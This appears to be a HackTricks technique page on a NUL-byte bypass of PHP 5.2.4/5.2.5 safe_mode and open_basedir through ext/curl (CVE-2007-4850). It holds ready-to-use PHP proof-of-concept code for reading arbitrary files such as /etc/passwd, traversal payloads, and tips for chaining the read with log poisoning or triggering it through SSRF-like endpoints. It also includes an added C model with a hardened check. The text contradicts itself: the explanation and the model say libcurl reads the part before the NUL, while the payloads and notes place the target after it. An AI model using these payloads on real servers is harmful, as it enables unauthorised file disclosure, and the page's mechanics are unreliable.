PHP 5.2.4 and 5.2.5 PHP cURL

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

This page describes an old technique, still useful in CTFs and on legacy local installs, for bypassing PHP's safe_mode/open_basedir checks through the cURL extension on specific PHP 5.2.x releases.

  • Affected: PHP 5.2.4 and 5.2.5 with ext/curl enabled.
  • Impact: arbitrary local file read despite safe_mode or open_basedir restrictions (no direct code execution).
  • ID: CVE-2007-4850.

Source: http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

One-liner PoC

If safe_mode or open_basedir is active and cURL is enabled, the following returns the contents of the current script:

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));

More explicit PoC (arbitrary file read)

<?php
// Preconditions (legacy): PHP 5.2.4/5.2.5, safe_mode or open_basedir enabled, ext/curl loaded
$target = '/etc/passwd'; // change to the file you want to read
$ch = curl_init();
// The trick is the NUL byte (\x00). The prefix can be any string: the NUL makes the
// safe_mode/open_basedir check validate a different string from the one libcurl uses.
curl_setopt($ch, CURLOPT_URL, 'file://prefix'.chr(0).$target);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$resp = curl_exec($ch);
$err  = curl_error($ch);
curl_close($ch);
if ($resp !== false) {
    echo $resp; // should contain the target file
} else {
    echo "cURL error: $err\n";
}
?>

Notes:

  • Use a double-quoted string or chr(0) to inject a literal NUL byte. Percent-encoding (%00) will not work reliably, because the NUL has to be present in the string PHP hands to the check, not decoded later.
  • This is a file-read primitive. Combine it with other primitives (log poisoning, session file inclusion, etc.) for further escalation where possible.

Why this works (short)

The flaw lies in how PHP 5.2.4/5.2.5 performed the safe_mode/open_basedir check for file:// URLs in ext/curl. The check parsed the URL and validated the path component, but because of how the NUL byte was handled it validated a different string from the one libcurl was given. In practice the validator could approve the path that follows the NUL, while libcurl, which receives a plain C string, used the part before the NUL as the URL. The check therefore passes for a string that is not the one libcurl acts on, and the NUL byte lets the caller decouple what is validated from what is read, which is the bypass. See the original analysis and the affected macro in ext/curl/interface.c for details. [CVE-2007-4850]
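The mismatch described above, modelled in C as an added example (this is not PHP's or libcurl's source; the function and struct names, the simplified file:// parser, the basedir value and the sample payload are this example's own). One parser reads the buffer over its declared length, as a length-aware validator does; the consumer side re-parses the same bytes as a C string, which ends at the first NUL. A flawed gate that only validates the length-aware view lets the payload through, while the hardened gate rejects any buffer whose strlen() disagrees with its declared length. The example also applies a lexical `..` normalization before the basedir comparison, since a check without realpath-style resolution is defeated by traversal just as easily as by truncation:

```c
#include <stdio.h>
#include <string.h>

/* Added example, not PHP's or libcurl's code: a minimal model of the bug class
 * behind CVE-2007-4850. The validator parses the buffer over its declared
 * length (as php_url_parse_ex(str, len) does); the consumer is a C-string API
 * (curl_easy_setopt(CURLOPT_URL, ...)) that stops at the first NUL. All names
 * below (file_url, gate_flawed, gate_hardened, ...) are this example's own. */

typedef struct {
    int  ok;          /* 1 when the buffer parsed as file://<host><path> */
    char host[128];
    char path[256];   /* "" when no '/' follows the host */
} file_url;

/* Parse exactly len bytes of "file://<host><path>"; an embedded NUL is just
 * another byte to this parser. Simplified: no userinfo, port, query, fragment. */
file_url parse_file_url(const char *buf, size_t len) {
    file_url u;
    const size_t plen = strlen("file://");
    memset(&u, 0, sizeof u);
    if (len < plen || memcmp(buf, "file://", plen) != 0) return u;
    const char *s = buf + plen, *end = buf + len;
    const char *slash = memchr(s, '/', (size_t)(end - s));   /* scans past a NUL */
    size_t hlen = slash ? (size_t)(slash - s) : (size_t)(end - s);
    if (hlen >= sizeof u.host) return u;
    memcpy(u.host, s, hlen);
    if (slash) {
        size_t n = (size_t)(end - slash);
        if (n >= sizeof u.path) return u;
        memcpy(u.path, slash, n);
    }
    u.ok = 1;
    return u;
}

/* The consumer's view: a C-string API only ever sees up to the first NUL. */
file_url parse_as_cstring(const char *buf) {
    return parse_file_url(buf, strlen(buf));
}

int path_is(file_url u, const char *want) { return strcmp(u.path, want) == 0; }

/* Lexical "realpath": collapse "." and ".." so "/var/www/../../etc/passwd"
 * compares as "/etc/passwd". Production code should use realpath(3); this
 * keeps the example offline. Returns 0 on overflow or non-absolute input. */
int normalize_path(const char *in, char *out, size_t outsz) {
    size_t o = 0;
    const char *p = in;
    if (*p != '/') return 0;
    while (*p) {
        while (*p == '/') p++;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t n = (size_t)(p - seg);
        if (n == 0 || (n == 1 && seg[0] == '.')) continue;
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            while (o > 0) { if (out[--o] == '/') break; }   /* pop one segment */
            continue;
        }
        if (o + 1 + n >= outsz) return 0;
        out[o++] = '/';
        memcpy(out + o, seg, n);
        o += n;
    }
    if (o == 0) out[o++] = '/';
    out[o] = '\0';
    return 1;
}

/* 1 if the normalized path is basedir itself or lives under it. */
int under_basedir(const char *path, const char *basedir) {
    char norm[256];
    size_t bl = strlen(basedir);
    if (!normalize_path(path, norm, sizeof norm)) return 0;
    return strncmp(norm, basedir, bl) == 0 && (norm[bl] == '/' || norm[bl] == '\0');
}

/* Flawed gate, the shape of the original bug: validate the length-aware view,
 * then hand the raw buffer to the C-string consumer unchanged. */
int gate_flawed(const char *buf, size_t len, const char *basedir) {
    file_url u = parse_file_url(buf, len);
    return u.ok && u.path[0] != '\0' && under_basedir(u.path, basedir);
}

/* Hardened gate: a disagreement between strlen() and the declared length means
 * an embedded NUL, so the two views could diverge; refuse outright. */
int gate_hardened(const char *buf, size_t len, const char *basedir) {
    if (strlen(buf) != len) return 0;
    return gate_flawed(buf, len, basedir);
}

int main(void) {
    /* Constructed payload in the shape of the page's one-liner: 42 bytes including
     * the embedded NUL (sizeof - 1 drops only the literal's own terminator). */
    static const char payload[] = "file://safe_mode_bypass\0/var/www/index.php";
    size_t len = sizeof payload - 1;
    file_url v = parse_file_url(payload, len), c = parse_as_cstring(payload);
    printf("validator sees path '%s', consumer sees path '%s'\n", v.path, c.path);
    printf("flawed gate: %d, hardened gate: %d\n",
           gate_flawed(payload, len, "/var/www"), gate_hardened(payload, len, "/var/www"));
    return 0;
}
```

Build with `cc -std=c99 nul_gate.c && ./a.out`. For the NUL payload the validator's path is `/var/www/index.php` and the consumer's path is empty, so the flawed gate prints 1 and the hardened gate prints 0; a clean `file:///var/www/index.php` passes both, and `file:///var/www/../../etc/passwd` is refused because the comparison runs on the normalized path.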

Limitations and fixes

  • Fixed in later 5.2.x releases (e.g. distro builds patched to 5.2.6) by correcting the parsing/validation in ext/curl.
  • Only affects very old PHP deployments; safe_mode was removed in PHP 5.4 and modern builds do not show this behaviour.

Historical cURL bypasses

  • CVE-2006-2563 (PHP 4.4.2/5.1.4): the libcurl wrappers allowed file:// access with embedded NULs to escape open_basedir; fixed before 5.2.x.
  • PHP bugs #30609/#36223 tracked earlier cURL open_basedir issues where file:// was handled without canonicalization. Any check that runs on the bytes before a NUL, or without realpath-style resolution, is open to the same truncation.

CTF notes

  • Once you have fingerprinted PHP 5.2.4/5.2.5 with ext/curl loaded (look for cURL support => enabled and the exact PHP Version in phpinfo()), this trick usually works even with allow_url_fopen disabled, because ext/curl handles file:// itself rather than going through PHP's stream wrappers.
  • If direct paths are blocked, try a relative traversal after the NUL, e.g. file://x\x00../../../../etc/passwd. The traversal is resolved by libcurl, not by the open_basedir guard.
  • You can carry the payload in a single HTTP request body to trigger the file read through vulnerable server-side code that passes user-controlled URLs into curl_exec() (common in legacy SSRF-like endpoints).

See also

Other disable_functions/open_basedir bypasses and modern techniques are collected here:

HackTricks
